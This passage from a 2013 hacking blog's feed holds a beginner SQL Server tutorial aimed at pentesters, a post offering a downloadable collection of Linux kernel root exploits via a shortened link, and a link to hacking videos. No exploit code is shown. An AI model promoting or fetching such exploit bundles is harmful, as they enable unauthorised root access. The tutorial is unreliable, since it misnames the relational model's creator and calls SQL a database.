src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-1103829739238788074</id><published>2013-02-24T17:36:00.000+05:00</published><updated>2013-02-24T17:36:17.664+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="sql language"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Penetration"/><category scheme="http://www.blogger.com/atom/ns#" term="web server"/><title type='text'>SQL DataBase for Pentesters</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;**!!%%%%%% ::::::::::ASLAM-O-ALAIKUM::::::::::%%%%%%%!!**&lt;br /&gt;&lt;br /&gt;**!!%%%%%% :::::: Ment@l Mind here::::::%%%%%%%!!**&lt;br /&gt;&lt;br /&gt;************************************************** *****************************************&lt;br /&gt;A LITTLE KNOWLEDGE ABOUT DATABASE (SQL SERVER)&lt;br /&gt;************************************************** *****************************************&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sorry for my very bad english but i will try my best to make this tutorial good :)..&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ok let&#39;s talk about database..&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; what is database..??&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * TO save some specific information or data in computer for agencies or some kinda institutes ..every institute or agency collect there data at one place(database) and then get the usefull results, the software use to collect all data is called database.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; basically there are two types of database:&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Pc Database&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Lan Databases&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; *Pc database was used to store data of single user database.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; *Lan database was use to connect one pc with other for sharing data (with local area network).&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; But they both were not so good becoz whenever you want to make changes in these databases you have to manage the whole data again..they had&#39;nt auto araange system.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; But DR E.E.CODE (IBM worker) in 1970 intorduced the new type of database called &quot;Relational Database&quot;.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; it was ,and it is most advance type of database with auto arrange,attributes,default systems,Relational operators,Domains, updated forms,tables,columns,rows etc etc&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; The best example of RElational Database is SQL (Structured Query Language)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now we will talk on SQl server Database:&lt;br /&gt;&lt;br /&gt;If you are hacker then you must have knowledge about database and it&#39;s types..&lt;br /&gt;&lt;br /&gt;ok come at the point on SQL:&lt;br /&gt;&lt;br /&gt;This is very powerful language (structured query language) using this we can make our own database and can also make specific changes whenever needed it will not effect to the whole database.&lt;br /&gt;&lt;br /&gt;Using this language we also can access to the database, can view data, can add data, delete data and can change data.&lt;br /&gt;&lt;br /&gt;Features of sQL server :&lt;br /&gt;&lt;br /&gt;1 = Database : We can make maximum 32767 databases on sql server..in which the minimum size of database is 512 kb and mximum size can be 1048516 tera bite.&lt;br /&gt;&lt;br /&gt;2 = Tables: The maximum number of tables in one database can be 2 billion and the maximum number of columns can be 1024.&lt;br /&gt;&lt;br /&gt;3 = Users Connection : 32767 users can access to the server.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQL server have 4 duafult databases for it&#39;s own use:&lt;br /&gt;&lt;br /&gt;1 : Master&lt;br /&gt;&lt;br /&gt;2: Model&lt;br /&gt;&lt;br /&gt;3: Tempdb&lt;br /&gt;&lt;br /&gt;4: Msdb&lt;br /&gt;&lt;br /&gt;and 2 users Databases:&lt;br /&gt;&lt;br /&gt;1: Pubs&lt;br /&gt;&lt;br /&gt;2: Northwind.&lt;br /&gt;&lt;br /&gt;.................................................. ..........................................&lt;br /&gt;Role of Master Database :&lt;br /&gt;&lt;br /&gt;Master Database controls users database and operations of SQL server. Master database has it&#39;s own default 14 tables which is called system catalog:&lt;br /&gt;&lt;br /&gt;* Sysaltfiles&lt;br /&gt;&lt;br /&gt;* Syscacheobjects&lt;br /&gt;&lt;br /&gt;* Syscharsets&lt;br /&gt;&lt;br /&gt;* Sysconfigures&lt;br /&gt;&lt;br /&gt;* Syscurconfigs&lt;br /&gt;&lt;br /&gt;* Sysdatabases&lt;br /&gt;&lt;br /&gt;* Syslanguages&lt;br /&gt;&lt;br /&gt;* Sysdevices&lt;br /&gt;&lt;br /&gt;* Syslockinfo&lt;br /&gt;&lt;br /&gt;* Sysxlogins&lt;br /&gt;&lt;br /&gt;* Sysmessages&lt;br /&gt;&lt;br /&gt;* Sysperfinfo&lt;br /&gt;&lt;br /&gt;* Sysprocess&lt;br /&gt;&lt;br /&gt;* Sysservers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Role of Model Database:&lt;br /&gt;&lt;br /&gt;MOdel database use as templates whenever a user makes a database the objects of model database automaticaly copy into the user&#39;s database..simply you can say every new database is a copy of model database..it has 17 default tables also called catalog :&lt;br /&gt;&lt;br /&gt;* Sysallocations&lt;br /&gt;&lt;br /&gt;* Syscolumns&lt;br /&gt;&lt;br /&gt;* Sysdepends&lt;br /&gt;&lt;br /&gt;* Sysfilegroups&lt;br /&gt;&lt;br /&gt;* Sysfiles&lt;br /&gt;&lt;br /&gt;* Sysforeignkeys&lt;br /&gt;&lt;br /&gt;* Sysfulltextcatalogs&lt;br /&gt;&lt;br /&gt;* Sysindexes&lt;br /&gt;&lt;br /&gt;* Sysmembers&lt;br /&gt;&lt;br /&gt;* Sysobjects&lt;br /&gt;&lt;br /&gt;* Syspermissions&lt;br /&gt;&lt;br /&gt;* Sysprotects&lt;br /&gt;&lt;br /&gt;* Sysreferences&lt;br /&gt;&lt;br /&gt;* Systypes&lt;br /&gt;&lt;br /&gt;* Sysusers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Role of MSDB Database:&lt;br /&gt;&lt;br /&gt;IT supports the server agent SQL... its also support the applications which is use for backup informations..SQL by itself automatical save history and backup into database it has 19 default tables i will write the name of tables in my next tutorial coz i forgot some of these names sorry for that :(&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Role of Tempdb:&lt;br /&gt;&lt;br /&gt;Tempdb is use to make temporary tables and there is just on Tempdb for all databases on SQL srever whenever a user left SQL server then it&#39;s temporary tables automaticaly disappears.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;.................................................. ..........................................&lt;br /&gt;:::::::::::::::Let&#39;s come at the hot part of this tutorial::::::::::::::&lt;br /&gt;&lt;br /&gt;Getting Data From Database using Select Statement:&lt;br /&gt;&lt;br /&gt;(SELECT) statement use to identify the tables or columns which contains data.&lt;br /&gt;&lt;br /&gt;(FROM) statement use to tell from which table we want to get data.&lt;br /&gt;&lt;br /&gt;(WHERE) clause use to tell the condition while getting data or use to filter data.&lt;br /&gt;&lt;br /&gt;(ORDER BY) clause use to configure data.&lt;br /&gt;&lt;br /&gt;(The combination of these statements can be the powerfull queries)&lt;br /&gt;&lt;br /&gt;get data using SELECT statement:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(Note: we will talki here about SQL server Not about SQL injection)&lt;br /&gt;************************************************** *****************************************&lt;br /&gt;using this command you get the data from table&lt;br /&gt;&lt;br /&gt;(SELECT * from table name)&lt;br /&gt;&lt;br /&gt;(*) operator use to get information from all columns of selected table&lt;br /&gt;&lt;br /&gt;For example : suppose you have table name (DATA)&lt;br /&gt;&lt;br /&gt;there are 4 columns in it and every column contains a name, id and roll no e.g&lt;br /&gt;&lt;br /&gt;column 1 = ||_MeNTaL-MiND_|| id:7 roll no:7&lt;br /&gt;&lt;br /&gt;column 2 = -|Shiman0|- id:8 roll no:8&lt;br /&gt;&lt;br /&gt;column 3 = sh4heen haxor id:9 roll no:9&lt;br /&gt;&lt;br /&gt;column 4 = Rox.Root id:10 roll no:10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;so whenevr you put this query on SQL query Analyzer :&lt;br /&gt;&lt;br /&gt;SELECT * FROM data&lt;br /&gt;&lt;br /&gt;you will get this result :&lt;br /&gt;name.................................id........... ...................roll no:&lt;br /&gt;&lt;br /&gt;Ment@l Mind...............7........................... ......7&lt;br /&gt;&lt;br /&gt;H4xorL1fe...........................8...................... ...........8&lt;br /&gt;&lt;br /&gt;PhpBugs......................9...................... ...........9&lt;br /&gt;&lt;br /&gt;Dr Trojan..............................10.......... .....................10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;it is just an example.&lt;br /&gt;&lt;br /&gt;and if you want get data from specific column then command will be :&lt;br /&gt;&lt;br /&gt;SELECT column name1,column name2,column name3 from table name&lt;br /&gt;&lt;br /&gt;then you will get the data from specified columns.&lt;br /&gt;&lt;br /&gt;************************************************** ******************************************&lt;br /&gt;Using WHERE clause:&lt;br /&gt;&lt;br /&gt;It is use to get filtered data or conditional data from table.&lt;br /&gt;&lt;br /&gt;for example: if there is a table (users) and you want to get data of specific user for example there is user name (Mental)&lt;br /&gt;&lt;br /&gt;and you want to get data of this user then use this query on your query analyzer:&lt;br /&gt;&lt;br /&gt;SELECT * FROM users WHERE name = &#39;Mental&#39;&lt;br /&gt;&lt;br /&gt;(note here &#39;name&#39; = column name in the table where &#39;mental&#39; user is exist)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&#39;WHERE&#39; word is realy a powerfull you can also use Relational operators with where clause and the operators are :&lt;br /&gt;&lt;br /&gt;&#39;=&#39; = equal to&lt;br /&gt;&#39;&amp;gt;&#39; = Greater than&lt;br /&gt;&#39;&amp;lt;&#39; = Less than&lt;br /&gt;&#39;&amp;gt;=&#39; = Greater than or equal to&lt;br /&gt;&#39;&amp;lt;=&#39; = less than or equal to&lt;br /&gt;&#39;&amp;lt;&amp;gt;&#39; = not equal&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;in addition you can also use some keywords with &quot;where&quot; clause...and the keywords are :&lt;br /&gt;&lt;br /&gt;* &quot;ANY&quot; (for a one specific value)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;ALL&quot; ( for all values )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;AND&quot; (for more than one condition)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;OR&quot; (for cheking one condition from two selected or specified conditions)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;BETWEEN&quot; (test or comparison between two values)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;EXISTS&quot; (statements for a value which is exists)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;NOTEXISTS&quot; (statements for a value which is not exists)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;NOT BETWEEN&quot; (statement for values which are not between the values mean which are not values)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;IN&quot; (state for values which are in range)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;NOT IN&quot; (state for values which are not in range)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;LIKE&quot; (state for values which are same)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;NOT LIKE&quot; (state for values which are not same)&lt;br /&gt;&lt;br /&gt;* &quot;IS NULL&quot; (state for null value)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* &quot;IS NOT NULL&quot; (state for values which are not null or empty)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&quot;I made this tutorial short and in several parts coz some peoples dont like long tutorials so the discussion will be continue in my next tutorial&quot;&lt;br /&gt;&lt;br /&gt;To be continued... details and examples of all these keyword and relational operators will be discussed in my next tutorial :)&lt;br /&gt;&lt;br /&gt;************************************************** *****************&lt;br /&gt;&quot;Leecher&#39;s Don&#39;t make changes dont put your name&quot;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/1103829739238788074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/sql-database-for-pentesters.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1103829739238788074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1103829739238788074'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/sql-database-for-pentesters.html' title='SQL DataBase for Pentesters'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-8530961172517858226</id><published>2013-02-23T13:09:00.000+05:00</published><updated>2013-02-23T13:09:12.571+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="exploits"/><category scheme="http://www.blogger.com/atom/ns#" term="Kernel exploits"/><category scheme="http://www.blogger.com/atom/ns#" term="root exploits"/><title type='text'>Kernal Root Exploit&#39;s Collection </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;A kernel root exploits collection provided by &quot;Madleets&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Security Team&quot; &#39;s Founder H4xorL1fe bro , it contains past 5&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;years of kernel root exploits 2006-2011,&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;size 6=&quot;&quot;&gt;&lt;b&gt;Here is the link below to direct download from mediafire:&lt;/b&gt;&lt;/size&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct Download:&lt;/span&gt;&lt;/h2&gt;&lt;/div&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;a href=&quot;http://adf.ly/JfKNT&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/8530961172517858226/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/kernal-root-exploits-collection_23.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8530961172517858226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8530961172517858226'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/kernal-root-exploits-collection_23.html' title='Kernal Root Exploit&#39;s Collection '/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6649588599148253300</id><published>2013-02-22T12:06:00.000+05:00</published><updated>2013-02-22T12:21:46.274+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="networking"/><category scheme="http://www.blogger.com/atom/ns#" term="Videos"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Penetration"/><category scheme="http://www.blogger.com/atom/ns#" term="web security"/><title type='text'>10 Best hacking Videos (Russian Language)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;My Friend Gave me this rar file which have 10 best hacking videos and good informative videos although the videos is in Russian Language , but you will easily understand the concept of video, here is the link below to direct download from Media Fire:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt; &lt;h2&gt;&lt;i&gt;&lt;span style=&quot;color: #9fc5e8;&quot;&gt;Direct download:&lt;/span&gt;&lt;/i&gt;&lt;/h2&gt;  &lt;br /&gt;&lt;center&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;i&gt;&lt;a href=&quot;http://adf.ly/JbSJH&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;/center&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6649588599148253300/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/10-best-hacking-videos-russian-language.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6649588599148253300'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6649588599148253300'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/10-best-hacking-videos-russian-language.html' title='10 Best hacking Videos (Russian Language)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><thr:total>0</thr:total></entry></feed>